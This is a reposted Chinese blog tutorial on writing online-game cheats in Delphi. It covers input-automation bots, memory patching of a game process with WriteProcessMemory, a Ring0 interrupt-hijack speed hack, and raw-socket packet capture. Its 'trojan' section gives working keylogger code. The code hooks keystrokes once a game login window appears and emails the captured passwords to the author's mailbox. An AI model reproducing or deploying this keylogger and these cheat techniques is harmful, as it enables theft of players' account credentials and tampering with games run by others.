delphi外挂制作(转)

 

在几年前我看到别人玩网络游戏用上了外挂,做为程序员的我心里实在是不爽,想搞清楚这到底是怎么回事。就拿了一些来研究,小有心得,拿出来与大家共享,外挂无非就是分几种罢了(依制作难度):
1、动作式,所谓动作式,就是指用API发命令给窗口或API控制鼠标、键盘等,使游戏里的人物进行流动或者攻击,最早以前的“石器”外挂就是这种方式。
2、本地修改式,这种外挂跟传统上的一些游戏修改器没有两样,做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现,“精灵”的外挂这是这种方式写成的,它的难点在于找到那些地址码,找地址一般地要借助于别人的工具,有的游戏还有双码校验,正正找起来会比较困难。
3、木马式,这种外挂的目的是帮外挂制作者偷到用户的密码,做这种外挂有一定的难度,需要HOOK或键盘监视技术做底子,才可以完成,它的原理是先首截了用户的帐号或密码,然后发到指定邮箱。
4、加速式,这种外挂可以加快游戏的速度。原本我一直以为加速外挂是针对某个游戏而写的,后来发现我这种概念是不对的,所谓加速外挂其实是修改时钟频率达到加速的目的。
5、封包式,这种外挂是高难度外挂,需要有很强的编程功力才可以写得出来。它的原理是先截取封包,后修改,再转发。这种外挂适用于大多数网络游戏,像WPE及一些网络游戏外挂都是用这种方式写成的,编写这种外挂需要apihook技术,winsock2技术…………
  以下就用Delphi实现网络游戏外挂。

1、首先我们要知道现在鼠标的位置(为了好还原现在鼠标的位置)所以我们就要用到API函数GetCursorPos,它的使用方法如下:
BOOL GetCursorPos(

      LPPOINT lpPoint    // address of structure for cursor position  
     );
2、我们把鼠标的位置移到要到人物走到的地方,我们就要用到SetCursorPos函数来移动鼠标位置,它的使用方法如下:
BOOL SetCursorPos(

      int X, // horizontal position  
      int Y    // vertical position
     );
3、模拟鼠标发出按下和放开的动作,我们要用到mouse_event函数来实现,具休使用方法用下:
VOID mouse_event(

      DWORD dwFlags, // flags specifying various motion/click variants
      DWORD dx, // horizontal mouse position or position change
      DWORD dy, // vertical mouse position or position change
      DWORD dwData, // amount of wheel movement
      DWORD dwExtraInfo    // 32 bits of application-defined information
     );
在它的dwFlags处,可用的事件很多如移动MOUSEEVENTF_MOVE,左键按下MOUSEEVENTF_LEFTDOWN,左键放开MOUSEEVENTF_LEFTUP,具体的东东还是查一下MSDN吧~~~~~
好了,有了以前的知识,我们就可以来看看人物移走是怎么实现的了:

    getcursorpos(point);
    setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机座标函数
    mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
    mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
    setcursorpos(point.x,point.y);

看了以上的代码,是不是觉得人物的游走很简单啦~~,举一仿三,还有好多好东东可以用这个技巧实现(我早就说过,TMD,这是垃圾外挂的做法,相信了吧~~~),接下来,再看看游戏里面自动攻击的做法吧(必需游戏中攻击支持快捷键的),道理还是一样的,只是用的API不同罢了~~~,这回我们要用到的是keybd_event函数,其用法如下:
VOID keybd_event(

      BYTE bVk, // virtual-key code
      BYTE bScan, // hardware scan code
      DWORD dwFlags, // flags specifying various function options
      DWORD dwExtraInfo    // additional data associated with keystroke
     );
我们还要知道扫描码不可以直接使用,要用函数MapVirtualKey把键值转成扫描码,MapVirtualKey的具体使用方法如下:
UINT MapVirtualKey(

      UINT uCode, // virtual-key code or scan code
      UINT uMapType    // translation to perform
     );
好了,比说此快接键是CTRL+A,接下来让我们看看实际代码是怎么写的:

    keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);
    keybd_event(65,mapvirtualkey(65,0),0,0);
    keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);
    keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);

首先模拟按下了CTRL键,再模拟按下A键,再模拟放开A键,最后放开CTRL键,这就是一个模拟按快捷键的周期。

本地修改式外挂最典型的应用就是在“精灵”游戏上面,因为我在近一年前(“精灵”还在测试阶段),我所在的公司里有很多同事玩“精灵”,于是我看了一下游戏的数据处理方式,发现它所发送到服务器上的信息是存在于内存当中(我看后第一个感受是:修改这种游戏和修改单机版的游戏没有多大分别,换句话说就是在他向服务器提交信息之前修改了内存地址就可以了),当时我找到了地址于是修改了内存地址,果然,按我的想法修改了地址,让系统自动提交后,果然成功了~~~~~,后来“精灵”又改成了双地址校检,内存校检等等,在这里我就不废话了~~~~,OK,我们就来看看这类外挂是如何制作的:
      在做外挂之前我们要对Windows的内存有个具体的认识,而在这里我们所指的内存是指系统的内存偏移量,也就是相对内存,而我们所要对其进行修改,那么我们要对几个Windows API进行了解,OK,跟着例子让我们看清楚这种外挂的制作和API的应用(为了保证网络游戏的正常运行,我就不把找内存地址的方法详细解说了):
      1、首先我们要用FindWindow,知道游戏窗口的句柄,因为我们要通过它来得知游戏的运行后所在进程的ID,下面就是FindWindow的用法:
HWND FindWindow(

      LPCTSTR lpClassName, // pointer to class name
      LPCTSTR lpWindowName    // pointer to window name
     );
      2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:
DWORD GetWindowThreadProcessId(

      HWND hWnd, // handle of window
      LPDWORD lpdwProcessId    // address of variable for process identifier
     );
      3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:
HANDLE OpenProcess(

      DWORD dwDesiredAccess, // access flag
      BOOL bInheritHandle, // handle inheritance flag
      DWORD dwProcessId    // process identifier
     );
      在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。
      4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

      HANDLE hProcess, // handle to process whose memory is written to  
      LPVOID lpBaseAddress, // address to start writing to
      LPVOID lpBuffer, // pointer to buffer to write data to
      DWORD nSize, // number of bytes to write
      LPDWORD lpNumberOfBytesWritten    // actual number of bytes written
     );
      5、下面用CloseHandle关闭进程句柄就完成了。
      这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:
const
    ResourceOffset: dword = $004219F4;
    resource: dword = 3113226621;
    ResourceOffset1: dword = $004219F8;
    resource1: dword = 1940000000;
    ResourceOffset2: dword = $0043FA50;
    resource2: dword = 1280185;
    ResourceOffset3: dword = $0043FA54;
    resource3: dword = 3163064576;
    ResourceOffset4: dword = $0043FA58;
    resource4: dword = 2298478592;
var
    hw: HWND;
    pid: dword;
    h: THandle;
    tt: Cardinal;
begin
    hw := FindWindow('XX', nil);
    if hw = 0 then
      Exit;
    GetWindowThreadProcessId(hw, @pid);
    h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
    if h = 0 then
      Exit;
    if flatcheckbox1.Checked=true then
    begin
      WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
      WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
    end;
    if flatcheckbox2.Checked=true then
    begin
      WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
      WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
      WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
    end;
    MessageBeep(0);
    CloseHandle(h);
    close;
      这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。

要做此类外挂的程序实现方法很多(比如HOOK,键盘监视等技术),因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库,所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视,这个程序用这种技术来实现比较适合。
      在做程序之前我们必需要了解一下程序的思路:
      1、我们首先知道你想记录游戏的登录窗口名称。
      2、判断登录窗口是否出现。
      3、如果登录窗口出现,就记录键盘。
      4、当窗口关闭时,把记录信息,通过邮件发送到程序设计者的邮箱。
      第一点我就不具体分析了,因为你们比我还要了解你们玩的是什么游戏,登录窗口名称是什么。从第二点开始,我们就开始这类外挂的程序实现之旅:
      那么我们要怎么样判断登录窗口虽否出现呢?其实这个很简单,我们用FindWindow函数就可以很轻松的实现了:
      HWND FindWindow(

        LPCTSTR lpClassName, // pointer to class name
        LPCTSTR lpWindowName    // pointer to window name
       );
      实际程序实现中,我们要找到'xx'窗口,就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现,那么我们就可以对键盘信息进行记录了。
      先首我们用SetWindowsHookEx设置监视日志,而该函数的用法如下:
HHOOK SetWindowsHookEx(

      int idHook, // type of hook to install
      HOOKPROC lpfn, // address of hook procedure
      HINSTANCE hMod, // handle of application instance
      DWORD dwThreadId    // identity of thread to install hook for
     );
      在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数,来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了,具体实现方法为:
hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
      而HOOKPROC里的函数就要复杂一点点:
function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall;
begin
if findedtitle then     //如果发现窗口后
begin
    if (peventmsg(lparam)^.message = WM_KEYDOWN) then    //消息等于键盘按下
     hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult(自定义的函数,主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的)转换消息。
    if length(hookkey) > 0 then    //如果获得按键名称
    begin
     Write(hookkeyFile,hookkey); //把按键名称写入文本文件
     hookkey := '';
    end;
end;
end;
      以上就是记录键盘的整个过程,简单吧,如果记录完可不要忘记释放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是创建setwindowshookex后所返回的句柄。
      我们已经得到了键盘的记录,那么现在最后只要把记录的这些信息发送回来,我们就大功造成了。其他发送这块并不是很难,只要把记录从文本文件里边读出来,用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下:
     assignfile(ReadFile,'hook.txt'); //打开hook.txt这个文本文件
     reset(ReadFile); //设为读取方式
     try
      While not Eof(ReadFile) do //当没有读到文件尾
      begin
       Readln(ReadFile,s,j); //读取文件行
       body:=body+s;
      end;
     finally
      closefile(ReadFile); //关闭文件
     end;
     nmsmtp1.EncodeType:=uuMime; //设置编码
     nmsmtp1.PostMessage.Attachments.Text:=''; //设置附件
     nmsmtp1.PostMessage.FromAddress:='[email protected]'; //设置源邮件地址
     nmsmtp1.PostMessage.ToAddress.Text:='[email protected]'; /设置目标邮件地址
     nmsmtp1.PostMessage.Body.Text:='密码'+' '+body; //设置邮件内容
     nmsmtp1.PostMessage.Subject:='password'; //设置邮件标题
     nmsmtp1.SendMail; //发送邮件

以前DOS时代玩过编程的人就会马上想到,这很简单嘛不就是直接修改一下8253寄存器嘛,这在以前DOS时代可能可以行得通,但是windows则不然。windows是一个32位的操作系统,并不是你想改哪就改哪的(微软的东东就是如此霸气,说不给你改就不给你改^_^),但要改也不是不可能,我们可以通过两种方法来实现:第一是写一个硬件驱动来完成,第二是用Ring0来实现(这种方法是CIH的作者陈盈豪首用的,它的原理是修改一下IDT表->创建一个中断门->进入Ring0->调用中断修改向量,但是没有办法只能用ASM汇编来实现这一切*_*,做为高级语言使用者惨啦!),用第一种方法用点麻烦,所以我们在这里就用第二种方法实现吧~~~
在实现之前我们来理一下思路吧:
1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门,修改向量等工作
2、调用这个过程来实现加速功能
好了,现在思路有了,我们就边看代码边讲解吧:
首先我们建立一个过程,这个过程就是本程序的核心部份:
procedure SetRing(value:word); stdcall;  
const ZDH = $03;          // 设一个中断号
var
    IDT : array [0..5] of byte; // 保存IDT表
    OG : dword;            //存放旧向量
begin
     asm
       push ebx
       sidt IDT                    //读入中断描述符表
       mov ebx, dword ptr [IDT+2] //IDT表基地址
       add ebx, 8*ZDH    //计算中断在中断描述符表中的位置
       cli                         //关中断
       mov dx, word ptr [ebx+6]
       shl edx, 16d              
       mov dx, word ptr [ebx]    
       mov [OG], edx      
       mov eax, offset @@Ring0     //指向Ring0级代码段
       mov word ptr [ebx], ax          //低16位,保存在1,2位
       shr eax, 16d
       mov word ptr [ebx+6], ax        //高16位,保存在6,7位
       int ZDH               //中断
       mov ebx, dword ptr [IDT+2]      //重新定位
       add ebx, 8*ZDH
       mov edx, [OG]
       mov word ptr [ebx], dx
       shr edx, 16d
       mov word ptr [ebx+6], dx        //恢复被改了的向量
       pop ebx
       jmp @@exitasm //到exitasm处
      @@Ring0:      //Ring0,这个也是最最最核心的东东
        mov al,$34      //写入8253控制寄存器
        out $43,al
        mov ax,value //写入定时值
        out $40,al      //写定时值低位
        mov al,ah
        out $40,al      //写定时值高位
        iretd           //返回
     @@exitasm:
     end;
end;
最核心的东西已经写完了,大部份读者是知其然不知其所以然吧,呵呵,不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧!
先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上:

SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));

因为windows默认的值为$1742,所以我们把1742做为基数,又因为值越小越快,反之越慢的原理,所以写了这样一个公式,好了,这就是“变速齿轮”的一个Delphi+ASM版了(只适用于win9X),呵呵,试一下吧,这对你帮助会很大的,呵呵。
在win2000里,我们不可能实现在直接对端口进行操作,Ring0也失了效,有的人就会想到,我们可以写驱动程序来完成呀,但在这里我告诉你,windows2000的驱动不是一个VxD就能实现的,像我这样的低手是写不出windows所用的驱动WDM的,没办法,我只有借助外力实现了,ProtTalk就是一个很好的设备驱动,他很方便的来实现对低层端口的操作,从而实现加速外挂。
1、我们首先要下一个PortTalk驱动,他的官方网站是http://www.beyondlogic.org
2、我们要把里面的prottalk.sys拷贝出来。
3、建立一个Protalk.sys的接口(我想省略了,大家可以上http://www.freewebs.com/liuyue/porttalk.pas下个pas文件自己看吧)
4、实现加速外挂。
本来就篇就是补充篇原理我也不想讲太多了,下面就讲一下这程序的实现方法吧,如果说用ProtTalk来操作端口就容易多了,比win98下用ring权限操作方便。
1、新建一个工程,把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。
2、我们在我们新建的工程加入我们的接口文件
    uses
      windows,ProtTalk……
3、我们建立一个过程
procedure SetRing(value:word);
begin
    if not OpenPortTalk then exit;
    outportb($43,$34);
    outportb($40,lo(Value));
    outprotb($40,hi(value));
    ClosePortTalk;
end;

4、先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上:

SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));

别看这是封包这一问题,但是涉及的技术范围很广范,实现的方式也很多(比如说APIHOOK,VXD,Winsock2都可以实现),在这里我们不可能每种技术和方法都涉及,所以我在这里以Winsock2技术作详细讲解,就算作抛砖引玉。
      由于大多数读者对封包类编程不是很了解,我在这里就简单介绍一下相关知识:
      APIHooK:
      由于Windows的把内核提供的功能都封装到API里面,所以大家要实现功能就必须通过API,换句话说就是我们要想捕获数据封包,就必须先要得知道并且捕获这个API,从API里面得到封包信息。
      VXD:
      直接通过控制VXD驱动程序来实现封包信息的捕获,不过VXD只能用于win9X。
      winsock2:
      winsock是Windows网络编程接口,winsock工作在应用层,它提供与底层传输协议无关的高层数据传输编程接口,winsock2是winsock2.0提供的服务提供者接口,但只能在win2000下用。
      好了,我们开始进入winsock2封包式编程吧。
      在封包编程里面我准备分两个步骤对大家进行讲解:1、封包的捕获,2、封包的发送。
      首先我们要实现的是封包的捕获:
      Delphi的封装的winsock是1.0版的,很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口,才可以使用winsock2。
      1、如何做winsock2的接口?
      1)我们要先定义winsock2.0所用得到的类型,在这里我们以WSA_DATA类型做示范,大家可以举一仿三的来实现winsock2其他类型的封装。
      我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer;,大家会发现WSData是引用参数,在传入参数时传的是变量的地址,所以我们对WSA_DATA做以下封装:
    const
      WSADESCRIPTION_LEN       =     256;
      WSASYS_STATUS_LEN        =     128;
    type
      PWSA_DATA = ^TWSA_DATA;
      WSA_DATA = record
        wVersion: Word;
        wHighVersion: Word;
        szDescription: array[0..WSADESCRIPTION_LEN] of Char;
        szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;
        iMaxSockets: Word;
        iMaxUdpDg: Word;
        lpVendorInfo: PChar;
      end;
      TWSA_DATA = WSA_DATA;
      2)我们要从WS2_32.DLL引入winsock2的函数,在此我们也是以WSAStartup为例做函数引入:
     function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;

     implementation

     const WinSocket2 = 'WS2_32.DLL';
     function WSAStartup; external winsocket name 'WSAStartup';

     通过以上方法,我们便可以对winsock2做接口,下面我们就可以用winsock2做封包捕获了,不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题,所以我们在这里以IP数据包为例做封包捕获,如果下面的某些数据类型您不是很清楚,请您查阅MSDN:
      1)我们要起动WSA,这时个要用到的WSAStartup函数,用法如下:
INTEGER WSAStartup(
                     wVersionRequired: word,
                     WSData: TWSA_DATA
                    );
      2)使用socket函数得到socket句柄,m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); 用法如下:
INTEGER socket(af: Integer,
                 Struct: Integer,
                 protocol: Integer
                );  

    m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP);在程序里m_hSocket为socket句柄,AF_INET,SOCK_RAW,IPPROTO_IP均为常量。

      3)定义SOCK_ADDR类型,跟据我们的网卡IP给Sock_ADDR类型附值,然后我们使用bind函数来绑定我们的网卡,Bind函数用法如下:

Type
      IN_ADDR = record
      S_addr : PChar;
     End;

Type
     TSOCK_ADDR = record
      sin_family: Word;
      sin_port: Word;
      sin_addr : IN_ADDR
      sin_zero: array[0..7] of Char;
     End;

var
    LocalAddr:TSOCK_ADDR;

    LocalAddr.sin_family: = AF_INET;
    LocalAddr.sin_port: = 0;
    LocalAddr.sin_addr.S_addr: = inet_addr('192.168.1.1'); //这里你自己的网卡的IP地址,而inet_addr这个函数是winsock2的函数。

    bind(m_hSocket, LocalAddr, sizeof(LocalAddr));

      4)用WSAIoctl来注册WSA的输入输出组件,其用法如下:

INTEGER WSAIoctl(s:INTEGER,
                   dwIoControlCode : INTEGER,
                   lpvInBuffer :INTEGER,
                   cbInBuffer : INTEGER,
                   lpvOutBuffer : INTEGER,
                   cbOutBuffer: INTEGER,
                   lpcbBytesReturned : INTEGER,
                   lpOverlapped : INTEGER,
                   lpCompletionRoutine : INTEGER
                  );
      5)下面做死循环,在死循环块里,来实现数据的接收。但是徇环中间要用Sleep()做延时,不然程序会出错。
      6)在循环块里,用recv函数来接收数据,recv函数用法如下:
INTEGER recv (s : INTEGER,
                buffer:Array[0..4095] of byte,
                length : INTEGER,
                flags : INTEGER,
               );
      7)在buffer里就是我们接收回来的数据了,如果我们想要知道数据是什么地方发来的,那么,我们要定义一定IP包结构,用CopyMemory()把IP信息从buffer里面读出来就可以了,不过读出来的是十六进制的数据需要转换一下。

      看了封包捕获的全过程序,对你是不是有点起发,然而在这里要告诉大家的是封包的获得是很容易的,但是许多游戏的封包都是加密的,如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章